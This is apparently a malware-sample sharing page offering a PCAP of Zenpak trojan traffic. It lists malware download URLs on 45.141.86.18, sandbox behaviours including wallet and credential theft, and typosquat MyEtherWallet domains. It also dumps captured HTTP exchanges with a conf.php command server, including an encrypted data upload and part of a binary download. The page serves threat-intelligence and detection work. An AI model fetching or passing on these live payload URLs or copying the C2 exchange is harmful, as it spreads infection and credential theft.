AVAST? Business Antivirus Managed 1 Year-AS-EN

Zenpak Trojan Malware PCAP File Download Traffic Sample myehterwallet.top


Download Attachments

  • 1 pcap updatewallet
    Date added: February 10, 2020 1:16 am Added by: admin File size: 6 MB Downloads: 200
Dateadded (UTC)Malware URLStatusTagsReporter
2020-02-08 16:42:22http://45.141.86.18/files/dzjitNh.exeOnlineexe@abuse_ch
2020-02-08 16:42:18http://45.141.86.18/files/QWwiylX.exeOfflineexe@abuse_ch
2020-02-08 16:42:12http://45.141.86.18/files/KplagwO.exeOfflineexe@abuse_ch
2020-02-08 16:42:03http://45.141.86.18/files/IDRHHqr.exeOnlineexe


@abuse_ch

What Trojan.Win32.Zenpak.usq virus can do?

  • Executable code extraction
  • Attempts to connect to a dead IP:Port (1 unique times)
  • Creates RWX memory
  • Expresses interest in specific running processes
  • A process created a hidden window
  • HTTP traffic contains suspicious features which may be indicative of malware related traffic
  • Performs some HTTP requests
  • Unconventionial language used in binary resources: Sindhi
  • The binary likely contains encrypted or compressed data.
  • Uses Windows utilities for basic functionality
  • Attempts to repeatedly call a single API many times in order to delay analysis time
  • Steals private information from local Internet browsers
  • Collects information about installed applications
  • Attempts to access Bitcoin/ALTCoin wallets
  • Harvests credentials from local FTP client softwares
  • Harvests information related to installed instant messenger clients
  • Harvests information related to installed mail clients
  • Collects information to fingerprint the system
  • Uses suspicious command line tools or Windows utilities

Related domains:

z.whorecord.xyz
a.tomx.xyz
myetherwalet.top
myehterwallet.top

2020-02-08 20:05:37.803086 IP 192.168.86.25.56286 > 45.141.86.139.80: Flags [P.], seq 2191070756:2191071275, ack 3720491098, win 16425, length 519: HTTP: GET /update/updatewallet.exe HTTP/1.1
E../..@…VB..V.-.V….P…$..0ZP.@)O…GET /update/updatewallet.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=106272-
Unless-Modified-Since: Sun, 09 Feb 2020 01:00:02 GMT
If-Range: “45400-59e1a24828f58”
Host: 45.141.86.139
Connection: Keep-Alive

2020-02-08 20:06:16.382474 IP 192.168.86.25.56287 > 47.252.10.241.80: Flags [P.], seq 2454723221:2454723288, ack 936642715, win 16425, length 67: HTTP: GET / HTTP/1.1
E..k..@…….V./.
….P.P..7…P.@). ..GET / HTTP/1.1
Connection: Keep-Alive
Host: myehterwallet.top

2020-02-08 20:06:16.693132 IP 192.168.86.25.56288 > 47.252.10.241.80: Flags [P.], seq 150158847:150158988, ack 1965259756, win 16425, length 141: HTTP: GET /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
E…..@….y..V./.
….P..=.u#{.P.@)W…GET /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: myehterwallet.top

2020-02-08 20:06:17.180098 IP 47.252.10.241.80 > 192.168.86.25.56288: Flags [P.], seq 1:687, ack 141, win 473, length 686: HTTP: HTTP/1.1 200 OK
E…i.@.3…/.
…V..P..u#{…>.P…J…HTTP/1.1 200 OK
Date: Sun, 09 Feb 2020 01:07:05 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

1dc
mewak5bZKCuA6r9kYczc1/Pfc72ek1lz0pz5X8NprUwRMgktR+fSAHTNsERAgroi/LUEECvxC2ORcVpPqS9hIF1sopmqWfSBYv3Cnhal1rzhf2M9djiZ4QkgKOHvhfuD7VVQoiZScbgHJL3uTywWOAMg/ItYHRrvcrU3aJ+22eGOoZawPhkj1T0hCcqpimreS9n0fZ5UVMlHBvNApSToQEbwUGiT9VnbqphjOBjZNzaciNK21oVaTacTcg4IWIvpkKaIUHpJ5QJ1ms2FzPz4O+JniA2W/O20GyxrVB+alU/Zu4+8KFueQOZCWp3+YtKKr0YNnK9n3jeeR/HsU2tmUUEFUuqU/WHnpNNgMKLytvFhsCzIgvaYrIsW27YmG0DMki7SyWQFABNnBrBMWQKbtSDWN68tJCqWXbooHDETteZydsHNOpsLvJMbdrXgP3LCsOqmw2OXW3QTYq0TxOpB1hIy+Q==
0

2020-02-08 20:06:18.267343 IP 192.168.86.25.56289 > 47.252.10.241.80: Flags [P.], seq 1029859406:1029859588, ack 1948574692, win 16425, length 182: HTTP: POST /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
E….!@….J..V./.
….P=bhNt$..P.@)….POST /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Content-Encoding: binary
Host: myehterwallet.top
Content-Length: 84067

2020-02-08 20:06:18.388116 IP 192.168.86.25.56289 > 47.252.10.241.80: Flags [P.], seq 79022:84249, ack 1, win 16425, length 5227: HTTP
E….d@….R..V./.
….P=c..t$..P.@)^2..EqLGV..KirY.Ad.iC~A|Qq.Jltc.{vgOqMFWC.s...>@k~m.zU).}C....].<3.?. ...x-l..l".. =."E...5).a|;gs ...&^..2.#.r..q E..;%;./0v*p.d4.1p./U,x>.!$l..03G..N4.[!.6.D.7p:# ...1.+j06]8*.g2z.>.-~/...R .*7. @[..x...=FE.%3A97"J*]7.|.>.<)7.,V..$.savb.{seE{MOPx.sktk.@esc}{IOW{.Nkrc>BcqfCqLFmc>Y…r8…(.>0..q0 Z.73 h2<);.,.+&C%=gC..!?…. gH”%.!’45%!W1.72c?;”..?..^}x.i>.c7$%..9!D!yU.a1.w3#$.1′”%^’U..7.s7$%..9!D!yU.a1…;$..;.1V:x:.41c7=..N>..%%n./#
l3$$..#!.59VKl26w@’%)F}!.!>x:.5.M.Y!?….I[.w76U.0.ZN~JNmx.Noq.CcvZDy@FVy.IRva.CctgD.H|Ty.Ol|g.{yLp(.>0..q<...r8...Mi?..+V.*.2D.7'$..5..;[ 7"'h&:(4.>.*$&[.1! h=<1..0L. Y.4'cP..t.Y=..jCk&;"7A.7L4.q@@R/VMk'7.@1pN/J…Lh!kQ.g’2F|NN^x.Mj}YY.?%.,V..$.sasa.{awhN{J@Vx.sktk.Iasc}xOESy.@ivY.AdpdO{@|MCk.9N.u@}t~C.@O^..@ijb.Gk.aN}KFm$U.;t7Q_0)=XCI@Wy>Hjtf.Acwf}zHOVx.NaN.HcudNxJ|Ty.Ol|a.{yL.. .| ..Wjjd.AathNzHXV|.Aauj.BcL=.%.F.,..7)|>@ev}xHAS|.Alue>BcqfByJOmz.@hwg.@aLcG~NB_{.srN.k.'+1}xJCVy.Nit}.Gk.iApAGIx.O}b.Ev~F|NN^x.Mku}.De~iFpLEVg.s5%?WA7#~.&.Ymx.IhNg.Cfsa@zIDmz.@iue.IYwgNpNB^x.sktd.Ekth}cr)8<@."Nb.Dbvf@xHXV|.Aauj.BbhaYxV..$W *y{P.!#3.…$W.6y{P.!#3....$W.<y{Z.=#y}$...yP.v'<Y^YwfGyrETz.Lnpb.AYuOyICSy>Ho}j.Ejwb}zHAQ}.KNy>Q...1.43".r?...q4if..(...;h.(47U.2...* ..&R...:Z.<1#+ ... Q ..<C-!?d.'8..=\.9#..,}2(.Dr.. Psi!5RD7qZq.C.d..ht~UD5t}CzO.Uq..hq1V{>’$.=..I[.wNa.EdrhC.ODm{.Ojpj.Cc~ZDy@BWp.KRub.FdseAyH|Ty.Laqa.{yL%. ..m(R…b{.07.1? G.(a ?..E.#4.A”…A=.,.B.’0(.?..0.Q0..”G#$.6..J..yA:./.G&|$…>7.>xM”0.D2d. /}..T.{.6r..Zf. JC…!@.?j0[.|LbF}OB}.NjNa.GariC{HNmz.Altj.CYwaFqH@R..IRwc.DjsbBCR|G.r?…q4…1.43″s.>%1V.!.1.9…(h41′![.< $+….&C ..<[.:##+…;;MM/*.Y.7/1,x%X.1@tR2:G.’)”Z .|Uy.Ok}k.A`wgOq@FWy./itYY.7/1Y’..HC.Hlsg.Eeqb}~OFRz.Hn|Y.AkubN}J|Ty.Aj|b.GgLcG~MORx.srN7U.2k>.:rG^y.K.wjwC.wfG

F^|wKj..wB.~fF|H..z>.= :U_=#$XCJGS~.Alrd.{brB~MAVq.sktk.Adrf}xOGUp.Imse>Bcqf@zIOmc>Y...r8...(.>0..q<bd.F.1$5.....-U.9..].!)#./.*0 Z.73 h2<);.,.*+&C%*=gC..+#..J+I=L.UN.F.5#".'....G.R!*~81ta..?0 .g0n!*~%7...*? ..^ :..C....#-0<.*s/.&af@1........g.1..r.2t.G.JO..Y.6 .~.7.<.+.?Q,M3...~. .....<.+]Hi'*}..*.F*04..l7"..~.1..G... .c."..C....... .*Y/3..r. u...J #+.+4.9[. .d.- ;..w3.&b.7..B.JO..g0n.?b%.(aN.;..* .*.8.+.M1.9rHcL=.’V..$.sasa.{avd@zKFQq.sktk.Ajrg}xNER..Imse>Bcqf@zIOmc>.968Q..45.C..J.Ae~h}zHNSy.MoNb.BfpG|O@mz.Nns.HYlZ(.<1".bsiN>G.}%?.frOP{.siwc.AcueO}rEWq.Nasb>CjrcE}IDQ}>Jhsf.DbpZ]C5#..>Hatd.7..E I@W rIaq..C…D.@@V|.s57=..<+.}xHDSC.Jntc.Bf~d}zHNT~.NiNa.HpcF{NBmz.Nm}f.GYlZ: I| .}=erj.Gbq1Dx..^}VOm}b.@k~6BxAC.z.Ijb.u".{fN|NP+. Khuj.Iu.mCo4#Zx.Onr.CvaC~r..'..7)|>@ctd}~OFRz.Hn|Y.AkubN}J|Ty.Lirb.GgLcG~MORx.srNsk7...;.=)!.r0....Q.41.+..;(D <%'U-./3.&...=h.1*7[. ...&...:h573.F.g1>7&...*@..!~G.6.a*g...D>&?%Ys0bhbY{IDQp.Miqd.@fphN{@BT.>.:.6W.:05Z:..I*[.wNb.AcLdGpIDW}.@nN.HbwfNprBVp.Hn}e>BcqfCqLOmc>&?-7>6.w~EgI@U|.K}c._bsfOpJNSz.s7&9Q.'/&.d...gW.5kY.GcvZ@|HG^|.IhN.FesByrBVp.Hn}e>BcqfCqLOmc>&?%'>@Y)2.,...?QT+!6..<+.}xNFWC.Jra.GjpZDyO@Sq.@Rpa.CbpiACKFP..Al}Y.{s..1.1:”.k?…x4.|p0;…,F%94#P.”.: …:[.,..].7)’..;..”].+..[..4)C>.6.(M 9(.FesaAxrGQx.Ihpd.EYu@|ACUx>SRd.r7…2.’0!.}5..i.6!’2., *.9D.902h<:%”.:….c.6 …U.<66G.243..J+I=L.UN.}5YwcGxNCU|.Mm%b.F1u2FyMC.x.Onr.CvZ.U.<66G.243.g.. f>Kipd.IgpgECLDPx.Km}a.{viG}KCRC.Iisj.@apd}zHARp.HnNy>$...}xM@Q..Ajwc>.0)".*...;Q =%!W.}%?.frDV}.Mpe.CYrb@xHDRp.IRwc.AgueBCKFV~.Oive.{vgBpMGQC.sx..r7. .2.>0!.x<.~ss.2$2.;$..9P.,%.y.04?.&..;.].<+$G-.)?. ..;.[..6*..=.$. .../A 1+=oC.h$.=u|&.{7...>.f("A ....^8....7c-.-+.DQz.#:|fe7&.;....=(P..&:m'+- .~..3|YK3.>a59..-(.O .VOi.8>.!/2.%... [.v'<Y^YtaC~LNS..KRu.Ec~gEpN|Ty.Na}j.{bwaN}NCQy.sktd.Hfte}crV8.r?…q….>.=3]is.9&1Q..’ .-….y.;6G%.+<.65.;&..0..6.$C.}$9..#G:g@.,IYy$…}xAFP{rJa.aw@ev.1yAC${.?..qIeweGC...gV.6#}W.>iZN{I@m{.Ohte.HjtZDy@EPp.JRwj.BqfA~J|Ty.Laqb.{yLp(.>0..q<…r8…Mi?..+V..2D.7’$..5..;[
7″‘h&:(4.>.$&[.1! h=<1..0L. C./j>G..w.Y=..jC@.5! [.6 6.:…’y.67Y.EcL’.>V..’..7)|>@ev}zOGR..Hose>Bc~dG~LBmx.@hqb.DdpZDyO@Pz.@RnYk.1.<.CI|.>CW57=..<+.}xNFWC.Hj}c.Ic~ZDy@E_p.NRwc.HauaE.L|Ty.Laqb.{yL..+r4&.N),.d.B.<.-.-1m>C.v) Z_0)=XCI@Wy>Jntk.GcraACKF_}.No}Y.FbubOyMAQC.Iord.@jLz}....;@.=%'.{}weA.NE_{.Nhud.@fpiNqABQy.Ajc.AcvGyHFWy.Ihu}.'>.4. .!- _.h <c)...$.0 =g.s/3$.. (~.&.Ymx.IhN.AkvfG}I@mz.Alrd.HYwgFzJNW|.ORwc.GduaNCR|G.r?…q4…1.43″s.>%1V.!.1.9…(h41′![.< $+….&C ..<[.:##+…;;MM/.M.;)?,{%X.1@tR.YPB231.9..V|P.~&n.W {6.C…&[W;+>.{bvbCCKAUz.Njqd.{vhD|KG^C.Hkwk.Dev}zHARp.KmNy>Q…1.43″.r?…q4if..(…;h.(47U.2… ..&R…:Z.<1#+ … Q ..[Yf.1.>?+.q&…}=..jW.
..+Q..%#D.221+….&G.>0.c.=”?.:$5.&_.=7.F.g1>7$…yP..u…+2]}.’..-A.>@krcE}AGUC.Iorg.CkLz}i’0!.}5…r7…2.BV ;U.:!!h.#64.=.** W.77<R…9.-….w.7/:Q..4)C>.6.&A.-&6oC.h$.=u| .gsiN*[.’32.g.. f>Hhvg>@~gFxJG^{>Jhse.Ij~ZC{ADV~.AarY.AdsiB{L|MCb0…{#…1.I)+.bMh}e.GcsaECKFPp.HhwY.Cjta@{@OQC.Ioqj.CgLz}i’0!.}5…
2020-02-08 20:06:19.685747 IP 47.252.10.241.80 > 192.168.86.25.56289: Flags [P.], seq 1:169, ack 84249, win 2390, length 168: HTTP: HTTP/1.1 200 OK
E….M@.3..,/.
…V..P..t$..=c.gP. VZd..HTTP/1.1 200 OK
Date: Sun, 09 Feb 2020 01:07:06 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 2
Connection: close
Content-Type: text/html; charset=UTF-8

OK
2020-02-08 20:06:57.769720 IP 192.168.86.25.56290 > 45.141.86.18.80: Flags [P.], seq 4100635938:4100636341, ack 801110070, win 16425, length 403: HTTP: GET /files/zbJTJNs.exe HTTP/1.1
E….n@…Vn..V.-.V….P.j.”/..6P.@)4…GET /files/zbJTJNs.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 45.141.86.18
Connection: Keep-Alive
:
2020-02-08 20:09:06.075785 IP 192.168.86.25.56293 > 45.141.86.18.80: Flags [P.], seq 2008031888:2008032291, ack 1820992094, win 16425, length 403: HTTP: GET /files/bcLgQFf.exe HTTP/1.1
E…
3@…T…V.-.V….Pw.”.l.”^P.@)….GET /files/bcLgQFf.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 45.141.86.18
Connection: Keep-Alive

2020-02-08 20:13:59.060517 IP 192.168.86.25.56311 > 45.141.86.18.80: Flags [P.], seq 1506290374:1506290777, ack 1695482312, win 16425, length 403: HTTP: GET /files/IDRHHqr.exe HTTP/1.1
E….|@…P`..V.-.V….PY.*.e…P.@))…GET /files/IDRHHqr.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 45.141.86.18
Connection: Keep-Alive

2020-02-08 20:24:26.726136 IP 45.141.86.18.80 > 192.168.86.25.56290: Flags [P.], seq 4234001:4235461, ack 403, win 237, length 1460: HTTP
E….I@.5..r-.V…V..P..0..F.j..P…fU..8…H.@PH9…%……L…..A…………L……………….H..t…L….t …..d…H..8…L9.t.L………H…..H……L…..L……M…..M……N…..N……O…..O……P……..P…..A…S,..t2…t-H..t.D.O,E..t…..t.D9….
..f..V,……..A…..tCH..t&…..t.L.O.L.G.L.S.H.S.M).L).I9…T ..H.N.H.S…n%………A…..t).S D.C$H..t……..~…D.F$.V ……..A…..t!.S(H..t……..4….V(……..A…..t!.S0H..t………….V0……..A…..t!.S4H..t………….V4……..A…. t!.S8H..t….. ..r….V8… ….A….@tdH……H..tXH..t0…@..t(H……H..t.H9.u.H……H…………t.H9.t.H……H………%….@….A………..H……H……..H…………….}…H……H….m…H9…d…H……H…….Q.…..I…..A……….r…H………d………..’………tFf..D…………2…H9…….H.SPH.NP…%…….H……H………%.D..A……t#.K@H..t……………..N@……D..A……t6H..t……………..H9.t.H……H…….~.%…….D..A…. .t4H..t……. …….H9.t.H……H…….A.%….. .D..A….@.t.H..t……@…n…….@.D..A……tm.KDH..t……………CHD.NDD.FH…t.A…………..t
A………..t
A………………. .!.D .D!..FH ..VDD..A……t..SLH..t…………………VL…..H.. [^_]A.…………………X…H..t……..t.9.X………….X…%………………………H9.t.H……H………%………A……..u
H…….t@H..t.H………………H..u~H9.t.H……H………%………A……..t%D.C<H..t…………….D.F<…..

Please follow and like us:

Written By

admin

Leave a Reply